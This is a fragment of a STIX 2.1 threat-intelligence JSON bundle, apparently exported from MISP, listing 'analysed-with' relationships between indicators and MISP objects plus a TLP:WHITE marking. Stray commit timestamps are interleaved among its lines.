"id" : "relationship--18ce4b1b-1f08-4264-828c-11a1550e504d" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-05-26T08:25:53.000Z" ,
"modified" : "2019-05-26T08:25:53.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--7ed42a8d-d9f9-40bb-8e6f-4141b08ac14c" ,
"target_ref" : "x-misp-object--e844333b-ee9f-4d2b-8d3a-17a29d6fa3d7"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-05-19 09:05:37 +00:00
"id" : "relationship--ceee9fc7-5f89-4357-96ec-0afeb2451e35" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-05-26T08:25:53.000Z" ,
"modified" : "2019-05-26T08:25:53.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--94b76905-bc8e-4167-9633-b19262f34af8" ,
"target_ref" : "x-misp-object--5c2ed803-b879-4d3c-9d36-583c1fde2562"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-05-19 09:05:37 +00:00
"id" : "relationship--d891033f-fbd3-407d-9af1-3fb4a52c1d50" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-05-26T08:25:53.000Z" ,
"modified" : "2019-05-26T08:25:53.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--3751d8a9-13b3-4049-82ec-9607df7fc404" ,
"target_ref" : "x-misp-object--ecfc06ea-0951-451d-8b9a-4aeae8c7f133"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-05-19 09:05:37 +00:00
"id" : "relationship--84e212cd-36ce-4cee-a788-132af9eac833" ,
2023-04-21 14:44:17 +00:00
"created" : "2019-05-26T08:35:53.000Z" ,
"modified" : "2019-05-26T08:35:53.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--195d072c-cab6-4370-b8ea-cf509e00959b" ,
"target_ref" : "x-misp-object--e0949b09-cf58-44f5-9455-d6253e56a131"
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}